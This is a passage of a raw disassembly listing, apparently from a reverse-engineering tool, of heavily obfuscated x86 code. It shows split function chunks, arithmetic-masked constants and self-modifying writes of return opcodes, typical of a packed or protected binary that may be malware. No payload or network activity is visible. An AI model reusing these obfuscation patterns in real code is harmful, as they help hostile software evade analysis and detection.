; END OF FUNCTION CHUNK FOR sub_4445DC
; =============== S U B R O U T I N E =======================================
sub_45A2AD proc near ; CODE XREF: sub_44064B+703Dp
; ut7h7i2x:004486CCp ...
; FUNCTION CHUNK AT 00447983 SIZE 00000005 BYTES
jnb loc_447983
push ebp
mov ebp, esp
push offset sub_457FD0
jmp nullsub_425
sub_45A2AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_45A2C0: ; CODE XREF: sub_439701+192ACj
xchg eax, [edx]
adc eax, ecx
xchg eax, [edx]
jmp loc_457A3E
; END OF FUNCTION CHUNK FOR sub_439701
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_253. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45A2CC: ; CODE XREF: ut7h7i2x:004505B0j
jmp loc_449A62
; ---------------------------------------------------------------------------
loc_45A2D1: ; DATA XREF: sub_45854D-1CB6Ao
mov edx, eax
jmp loc_4570BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_45A2D8: ; CODE XREF: sub_45854Dj
mov edx, ds:dword_43AEB0
or edx, edx
jnz loc_43D767
jmp loc_43ED14
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
loc_45A2EB: ; CODE XREF: ut7h7i2x:0043B496j
; ut7h7i2x:loc_43FB9Aj
mov eax, [esp]
push eax
call sub_43CA2D
or eax, eax
jnz loc_458DD4
jmp loc_43A691
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_488. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45A302: ; CODE XREF: ut7h7i2x:0043A1E9j
jmp loc_4477F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_196. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_45A308: ; CODE XREF: sub_444029+12BBAj
jmp loc_454E9D
; END OF FUNCTION CHUNK FOR sub_444029
; =============== S U B R O U T I N E =======================================
sub_45A30D proc near ; DATA XREF: ut7h7i2x:004452A1o
xchg ecx, [esp+0]
jmp sub_43BA59
sub_45A30D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_45A315: ; CODE XREF: sub_43ADDB:loc_44627Bj
; sub_459DE7-B111j
pop esi
and esi, 5DA1ABE5h
sub esi, 16154230h
or esi, 13CB5C57h
jmp loc_456C70
; END OF FUNCTION CHUNK FOR sub_43ADDB
; =============== S U B R O U T I N E =======================================
sub_45A32D proc near ; CODE XREF: ut7h7i2x:0044EFF4j
; sub_453177j
; DATA XREF: ...
; FUNCTION CHUNK AT 0043D800 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043EBD6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043F888 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044846A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B3F1 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0044C344 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E481 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045934C SIZE 00000011 BYTES
push 22AF071h
pop esi
or esi, 0A176C737h
sub esi, 4085F38Ah
jmp loc_43EBD6
sub_45A32D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_45A344: ; CODE XREF: sub_4433C5:loc_457EBBj
ror esi, 8
xor ebp, eax
popf
jmp loc_4475EE
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_45A34F: ; CODE XREF: sub_4583E7:loc_4449F4j
not edx
shl edx, 1Ch
sub ebx, eax
pop ecx
pop edx
jmp loc_458BC6
; END OF FUNCTION CHUNK FOR sub_4583E7
; =============== S U B R O U T I N E =======================================
sub_45A35D proc near ; DATA XREF: sub_441878+6o
add eax, 7FC923E9h
mov eax, [eax]
loc_45A365: ; CODE XREF: ut7h7i2x:loc_440A3Cj
push eax
call sub_452A50
sub_45A35D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_45A36B: ; CODE XREF: sub_4459EE+Bj
; sub_4459EE+F802j ...
mov esp, ebp
xchg edx, [esp-4+arg_0]
mov ebp, edx
jmp loc_452A4E
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_45A377: ; CODE XREF: sub_43C0DA:loc_450503j
jo loc_4417A4
jnz loc_43CBF6
jmp loc_454203
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
loc_45A388: ; DATA XREF: sub_44865D+E5DDo
push eax
push edi
push 4085C044h
pop edi
jmp loc_448A23
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_45A395: ; CODE XREF: sub_45341C-4C8Ej
xor edi, 0DED39415h
add edi, ebp
add edi, 6E701552h
mov [edi], eax
jmp loc_441C5A
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
loc_45A3AA: ; CODE XREF: ut7h7i2x:loc_43F08Fj
jnz loc_456161
adc ebp, edi
; START OF FUNCTION CHUNK FOR sub_43EDA4
loc_45A3B2: ; CODE XREF: sub_43EDA4:loc_454FB8j
sub eax, 0A581BDA3h
and eax, 0E802EA89h
sub eax, 74097631h
add eax, 0D44D2B9Dh
jmp loc_45716B
; END OF FUNCTION CHUNK FOR sub_43EDA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_45A3CF: ; CODE XREF: sub_44C852:loc_45A050j
; sub_44C852+D80Ej
rol ebx, 3
sub ebx, 8D2FBD2Eh
test ebx, 80000h
jmp loc_450E58
; END OF FUNCTION CHUNK FOR sub_44C852
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_263. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_45A3E4: ; CODE XREF: sub_439B67+958j
jmp loc_444358
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_45A3E9: ; CODE XREF: sub_452B14-25EBj
or ebx, 0D1E842EBh
push 508DD2B2h
jmp loc_43E896
; END OF FUNCTION CHUNK FOR sub_452B14
; =============== S U B R O U T I N E =======================================
sub_45A3F9 proc near ; CODE XREF: ut7h7i2x:00447A78p
; ut7h7i2x:004488B3j
; FUNCTION CHUNK AT 004558E7 SIZE 00000006 BYTES
xchg eax, [esp+0]
pop eax
rol eax, 9
call sub_44D082
pushf
jmp loc_4558E7
sub_45A3F9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4501C1
loc_45A40B: ; CODE XREF: sub_4501C1:loc_454F7Cj
mov dword ptr [eax], 646E6957h
lea eax, [ebp-18h]
mov dword ptr [eax], 6C43776Fh
lea eax, [ebp-14h]
mov dword ptr [eax], 737361h
push ecx
call sub_44A33F
; END OF FUNCTION CHUNK FOR sub_4501C1
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_45A429: ; CODE XREF: sub_4448D7+12FD9j
jmp loc_44CBF8
; END OF FUNCTION CHUNK FOR sub_4448D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_45A42E: ; CODE XREF: sub_453E14:loc_4538C9j
mov eax, [edi]
jmp loc_43CEB1
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
add ecx, edi
jmp sub_443C4A
; ---------------------------------------------------------------------------
loc_45A43C: ; DATA XREF: sub_442F0F:loc_44C306o
cmp dword ptr [eax], 0FFFFFFFFh
call sub_4392AE
; START OF FUNCTION CHUNK FOR sub_443A65
loc_45A444: ; CODE XREF: sub_443A65+7j
jmp loc_44F5D9
; END OF FUNCTION CHUNK FOR sub_443A65
; ---------------------------------------------------------------------------
loc_45A449: ; CODE XREF: ut7h7i2x:0045A5EBj
jz loc_4518E6
jmp loc_448277
; ---------------------------------------------------------------------------
loc_45A454: ; DATA XREF: sub_43BE93:loc_448332o
push eax
push 16502E19h
xchg ecx, [esp]
mov eax, ecx
pop ecx
xor eax, 4F9C8F7Ah
jmp loc_43ECB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_45A46B: ; CODE XREF: sub_4445DC+3E51j
sub al, 99h
mov edx, [ebp+var_4]
imul byte ptr [edx]
push offset loc_43D584
jmp loc_457AB7
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_45A47C: ; CODE XREF: sub_43C1D2+Ej
jz sub_456177
jmp loc_44A1C3
; END OF FUNCTION CHUNK FOR sub_43C1D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_45A487: ; CODE XREF: sub_43DBEC-34EDj
ror eax, 0Ch
mov ds:dword_446630, eax
retn
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_45A491: ; CODE XREF: ut7h7i2x:0044188Ej
jmp loc_44EB41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_45A496: ; CODE XREF: sub_43DBEC+7662j
rol eax, 0Ch
push eax
retn
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44261F
loc_45A49B: ; CODE XREF: sub_44261F+Aj
pop esi
and esi, 589DA49h
or esi, 2A459D6Ah
rol esi, 1Dh
jmp loc_4549C5
; END OF FUNCTION CHUNK FOR sub_44261F
; ---------------------------------------------------------------------------
loc_45A4B0: ; CODE XREF: ut7h7i2x:00456497j
jl loc_456C0D
jmp loc_443754
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D56
loc_45A4BB: ; CODE XREF: sub_452D56:loc_452D69j
pop edx
xchg edx, [esp+0]
loc_45A4BF: ; CODE XREF: ut7h7i2x:loc_45A10Aj
mov eax, [ebp-8]
push edx
push eax
jmp loc_446D12
; END OF FUNCTION CHUNK FOR sub_452D56
; ---------------------------------------------------------------------------
loc_45A4C9: ; CODE XREF: ut7h7i2x:loc_455C5Bj
push 71949587h
or ecx, 0FE1D1B99h
jmp loc_45A63F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_307. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45A4DA: ; CODE XREF: ut7h7i2x:0044FC5Bj
jbe sub_440482
jnp loc_43BBB1
push edi
jmp loc_44F7EA
; ---------------------------------------------------------------------------
loc_45A4EC: ; CODE XREF: ut7h7i2x:0044F66Ej
not eax
mov edx, esi
pushf
; START OF FUNCTION CHUNK FOR sub_439B58
loc_45A4F1: ; CODE XREF: sub_439B58:loc_44F65Bj
call sub_44A3D6
; END OF FUNCTION CHUNK FOR sub_439B58
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_45A4F6: ; CODE XREF: sub_449D3B:loc_44242Aj
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_43D9D2
jmp loc_44F225
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_45A508: ; CODE XREF: sub_44B45E:loc_448156j
jnz loc_44F424
jmp loc_4438EF
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441AED
loc_45A513: ; CODE XREF: sub_441AED:loc_43D759j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push 45AC4B82h
pop eax
sub eax, 803E4262h
cmp eax, 5B8FBF28h
jmp loc_44CC7A
; END OF FUNCTION CHUNK FOR sub_441AED
; ---------------------------------------------------------------------------
loc_45A530: ; CODE XREF: ut7h7i2x:0043E9F3j
cmp edx, 0EEE4B722h
jmp loc_445FB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440E38
loc_45A53B: ; CODE XREF: sub_440E38+12j
add eax, 0F353FB99h
retn
; END OF FUNCTION CHUNK FOR sub_440E38
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_45A542: ; CODE XREF: sub_447CBE-29D5j
jmp loc_44D5EE
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
loc_45A547: ; CODE XREF: ut7h7i2x:004415E0j
push esi
push 0CCF7BC66h
jmp loc_446814
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_45A552: ; CODE XREF: sub_44C8F3:loc_44E60Bj
call sub_449B76
; END OF FUNCTION CHUNK FOR sub_44C8F3
; START OF FUNCTION CHUNK FOR sub_44E9E4
loc_45A557: ; CODE XREF: sub_44E9E4+Bj
jmp loc_454222
; END OF FUNCTION CHUNK FOR sub_44E9E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_45A55C: ; CODE XREF: sub_440CEC+18EDCj
cmp esi, eax
jmp loc_454E6A
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_45A563: ; CODE XREF: sub_4469B9+BCE9j
and ebp, 0A6C7DF30h
loc_45A569: ; CODE XREF: sub_4469B9:loc_4395D3j
call sub_453D8B
mov edx, 0CB804A30h
call sub_44ED9F
push eax
ror eax, 1Ah
jmp loc_443E28
; END OF FUNCTION CHUNK FOR sub_4469B9
; ---------------------------------------------------------------------------
loc_45A581: ; CODE XREF: ut7h7i2x:0044DD1Ej
mov byte ptr [eax], 0C3h
jmp nullsub_418
; =============== S U B R O U T I N E =======================================
sub_45A589 proc near ; CODE XREF: sub_40C6EC+191p
; sub_45A589+5j
; DATA XREF: ...
call sub_45A599
jmp ds:off_41D124
sub_45A589 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_45A594: ; CODE XREF: sub_4544E6-71B5j
jmp loc_439C9B
; END OF FUNCTION CHUNK FOR sub_4544E6
; =============== S U B R O U T I N E =======================================
sub_45A599 proc near ; CODE XREF: sub_44A77E+Ej
; sub_43CA2D:loc_45261Dj ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043F6B2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446660 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A791 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AF63 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044E39A SIZE 00000005 BYTES
jnb loc_44A791
jmp loc_44E39A
sub_45A599 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45A5A4: ; CODE XREF: ut7h7i2x:0044223Dj
jo sub_458BDB
; START OF FUNCTION CHUNK FOR sub_456B5E
loc_45A5AA: ; CODE XREF: sub_456B5E:loc_442225j
add ebx, 1C7D320h
call sub_44DE3F
loc_45A5B5: ; CODE XREF: sub_44D1F0:loc_43EC74j
push 78FDA4B8h
pop ecx
xor ecx, 31D07DDCh
or ecx, 0B1CA69Dh
and ecx, 0BBD1FB26h
jmp loc_4454A1
; END OF FUNCTION CHUNK FOR sub_456B5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451900
loc_45A5D2: ; CODE XREF: sub_451900+74E9j
xor ecx, 18AE3CEEh
loc_45A5D8: ; CODE XREF: sub_451900:loc_451D61j
push offset sub_44E090
jmp loc_44BCC1
; END OF FUNCTION CHUNK FOR sub_451900
; ---------------------------------------------------------------------------
loc_45A5E2: ; DATA XREF: sub_44E5DC-AFD7o
cmp byte ptr [eax], 0F1h
jnz loc_4518EB
jmp loc_45A449
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458362
loc_45A5F0: ; CODE XREF: sub_458362:loc_44AAB3j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push eax
push offset loc_45116C
jmp nullsub_438
; END OF FUNCTION CHUNK FOR sub_458362
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_45A604: ; CODE XREF: sub_4408C2-2D29j
jz loc_44CA7D
jmp loc_442950
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_45A60F: ; CODE XREF: sub_450FDE:loc_4408ABj
pop edx
or edx, 16EBC370h
sub edx, 0E3188BAFh
add edx, 2F20635Ah
jnz loc_43CE1D
loc_45A628: ; CODE XREF: ut7h7i2x:0045384Ej
jmp loc_4475CC
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_45A62D: ; CODE XREF: sub_444273+5A7Cj
jmp loc_452F77
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
push ebp
not ebx
jmp loc_45A8AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439170
loc_45A63A: ; CODE XREF: sub_439170:loc_457D10j
call sub_4572E0
loc_45A63F: ; CODE XREF: ut7h7i2x:0045A4D4j
jmp loc_44E988
; END OF FUNCTION CHUNK FOR sub_439170
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4492A1
loc_45A644: ; CODE XREF: sub_4492A1+6j
jmp loc_4524A6
; END OF FUNCTION CHUNK FOR sub_4492A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_45A649: ; CODE XREF: sub_4459EE+1DDDj
jle loc_44E9F8
push ebx
jmp loc_44E6E0
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B106
loc_45A655: ; CODE XREF: sub_43B106:loc_43B110j
call sub_452E7F
mov eax, 0BEB860A6h
loc_45A65F: ; CODE XREF: ut7h7i2x:loc_447EAFj
call sub_43AA94
mov ds:off_41D12C, eax
lea eax, loc_454626
mov byte ptr [eax], 0C3h
jmp loc_43CC3F
; END OF FUNCTION CHUNK FOR sub_43B106
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FA50
loc_45A678: ; CODE XREF: sub_43FA50+7334j
mov eax, 0D4280129h
call sub_43AED9
mov ds:off_41D038, eax
lea eax, loc_443EFA
jmp loc_456300
; END OF FUNCTION CHUNK FOR sub_43FA50
; =============== S U B R O U T I N E =======================================
sub_45A693 proc near ; CODE XREF: ut7h7i2x:00450B83p
; ut7h7i2x:00451861j
xchg edi, [esp+0]
pop edi
mov eax, [eax]
or eax, eax
jmp loc_453AA2
sub_45A693 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_45A6A0: ; CODE XREF: sub_445AD1-91Dj
pop edi
loc_45A6A1: ; CODE XREF: sub_439BD1:loc_454621j
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_445AD1
; =============== S U B R O U T I N E =======================================
sub_45A6A5 proc near ; DATA XREF: sub_439BD1+C2F7o
; ut7h7i2x:0044B658o
push offset sub_44CC1E
jmp nullsub_447
sub_45A6A5 endp
; ---------------------------------------------------------------------------
loc_45A6AF: ; DATA XREF: sub_444E04+ECF1o
jnb loc_45A243
push offset loc_43B222
jmp locret_457EE9
; ---------------------------------------------------------------------------
loc_45A6BF: ; CODE XREF: ut7h7i2x:loc_453312j
jnz loc_45323A
jmp loc_44B968
; ---------------------------------------------------------------------------
locret_45A6CA: ; CODE XREF: ut7h7i2x:00450CCAj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B27
loc_45A6CB: ; CODE XREF: sub_439B27+171CDj
jmp loc_44DAE2
; END OF FUNCTION CHUNK FOR sub_439B27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_45A6D0: ; CODE XREF: sub_446F9A+99DDj
jnz loc_459D8C
jmp loc_457046
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4512E6
loc_45A6DB: ; CODE XREF: sub_4512E6+18j
jnz loc_4535F1
popf
jnz loc_44593D
sub eax, edx
cdq
loc_45A6EB: ; CODE XREF: ut7h7i2x:loc_447802j
jmp loc_4535F1
; END OF FUNCTION CHUNK FOR sub_4512E6
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jz loc_4484D7
jmp loc_443778
; ---------------------------------------------------------------------------
loc_45A6FF: ; DATA XREF: sub_452303-13Do
xchg edi, [esp]
push 109B24BFh
xchg ecx, [esp]
loc_45A70A: ; CODE XREF: ut7h7i2x:00447C41j
mov esi, ecx
pop ecx
jmp loc_447A85
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_240. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_45A713: ; CODE XREF: sub_44A3BB+3397j
jmp loc_43A46D
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_45A718: ; CODE XREF: sub_4396F5+5j
jmp loc_43D1DC
; END OF FUNCTION CHUNK FOR sub_4396F5
; =============== S U B R O U T I N E =======================================
sub_45A71D proc near ; DATA XREF: sub_455B51:loc_455689o
xchg edi, [esp+0]
call sub_43DB54
sub_45A71D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_45A725: ; CODE XREF: sub_43DCFF+9155j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D989
loc_45A72A: ; CODE XREF: sub_43D989:loc_44AF31j
push offset sub_445056
jmp loc_43AEB4
; END OF FUNCTION CHUNK FOR sub_43D989
; ---------------------------------------------------------------------------
add edx, 4AED8C63h
rol eax, 8
jmp sub_454FD4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_551. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F6E5
loc_45A743: ; CODE XREF: sub_43F6E5+1B706j
jmp loc_440CC8
; END OF FUNCTION CHUNK FOR sub_43F6E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_45A748: ; CODE XREF: sub_45601B-6FA3j
jno loc_43AA49
loc_45A74E: ; CODE XREF: sub_45601B:loc_459A30j
push offset loc_450911
jmp loc_445EEA
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44928D
loc_45A758: ; CODE XREF: ut7h7i2x:0043EE5Ej
; sub_44928D+5107j
or edi, 6D881665h
xor edi, 7DACBFE7h
xchg edi, [esp+4+var_4]
push 0
push 10h
jmp loc_442DA9
; END OF FUNCTION CHUNK FOR sub_44928D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F19A
loc_45A770: ; CODE XREF: sub_43F19A+17D73j
xor edi, 47A15841h
add edi, 0C67A25A1h
popf
add eax, edi
jmp loc_43BF49
; END OF FUNCTION CHUNK FOR sub_43F19A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_45A784: ; CODE XREF: sub_43DBEC:loc_449661j
; sub_43DBEC+BA83j
sub eax, 0E2B38A5Fh
add eax, 0E3F732E1h
mov eax, [eax]
or eax, eax
jnz loc_44540C
jmp loc_43E360
; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
sub_45A79F proc near ; DATA XREF: sub_457902+6o
; FUNCTION CHUNK AT 0043A01B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043C2B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EE6E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441B7D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00443058 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449A86 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044BD05 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BD4D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452B9F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452E5D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454964 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457F8A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458510 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ACBF SIZE 0000000B BYTES
add eax, ebp
add eax, 7114C0DAh
mov eax, [eax]
mov al, [eax]
jns loc_452E6F
sub al, 99h
jmp loc_458510
sub_45A79F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B85E
loc_45A7B8: ; CODE XREF: sub_44B85E:loc_44FEE2j
jge loc_440DFE
; END OF FUNCTION CHUNK FOR sub_44B85E
; START OF FUNCTION CHUNK FOR sub_448321
loc_45A7BE: ; CODE XREF: sub_448321+15E1j
jmp nullsub_473
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_45A7C3: ; CODE XREF: sub_44C273-F6BBj
jmp loc_45104B
; END OF FUNCTION CHUNK FOR sub_44C273
; ---------------------------------------------------------------------------
loc_45A7C8: ; CODE XREF: ut7h7i2x:0043BB35j
jmp loc_43ADF8
; ---------------------------------------------------------------------------
shl edi, 3
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_45A7D0: ; CODE XREF: sub_44BF76-BC3Bj
jge loc_44D904
sub edi, 2AE22F97h
jmp loc_440DF3
; END OF FUNCTION CHUNK FOR sub_44BF76
; ---------------------------------------------------------------------------
popf
ror ebp, 1Fh
jmp sub_439B58
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_45A7EA: ; CODE XREF: sub_44DF79-B641j
jz loc_44000F
or edx, 0ECF008F3h
jmp sub_440009
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455383
loc_45A7FB: ; CODE XREF: sub_455383:loc_43EA09j
; sub_455383-EDC7j
add ecx, 0B417A22Ch
xchg ecx, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_455383
; ---------------------------------------------------------------------------
loc_45A809: ; CODE XREF: ut7h7i2x:0044E555j
mov ecx, 0B2A8AC58h
jle loc_452C91
sbb ecx, 0B007782Eh
jmp loc_441E2E
; ---------------------------------------------------------------------------
and ecx, eax
jmp sub_44AD25
; ---------------------------------------------------------------------------
locret_45A826: ; CODE XREF: ut7h7i2x:00459F63j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E9F4
loc_45A827: ; CODE XREF: sub_44E9F4+Aj
jmp nullsub_460
; END OF FUNCTION CHUNK FOR sub_44E9F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445A99
loc_45A82C: ; CODE XREF: sub_445A99+Bj
jmp nullsub_461
; END OF FUNCTION CHUNK FOR sub_445A99
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_45A831: ; CODE XREF: sub_4497C1-5FDCj
jmp sub_4508DB
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
loc_45A836: ; CODE XREF: ut7h7i2x:00449865j
jns loc_44D8E9
; =============== S U B R O U T I N E =======================================
sub_45A83C proc near ; CODE XREF: ut7h7i2x:0044A9F4p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043BAF8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441C33 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445D57 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00452B4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457955 SIZE 0000000B BYTES
xchg edx, [esp+4+var_4]
pop edx
push 0E551F12Ch
pop eax
jmp loc_455F38
sub_45A83C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_45A84B proc near ; DATA XREF: ut7h7i2x:004525F5o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043D41F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444601 SIZE 00000018 BYTES
push edi
mov edi, ecx
xchg edi, [esp+4+var_4]
push 0B3D411E4h
jmp loc_444601
sub_45A84B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_45A85B: ; CODE XREF: sub_43CDBA:loc_44DCF7j
sbb eax, eax
neg eax
push ebx
push 390339E1h
pop ebx
add ebx, 6AFEAFD4h
rol ebx, 12h
and ebx, 54E78E85h
jmp loc_43D77D
; END OF FUNCTION CHUNK FOR sub_43CDBA
; ---------------------------------------------------------------------------
loc_45A87A: ; CODE XREF: ut7h7i2x:loc_44C27Ej
mov [ebp-8], eax
push offset sub_44C20D
jmp loc_43FEC8
; ---------------------------------------------------------------------------
mov ds:dword_41D0DC, eax
lea eax, nullsub_229
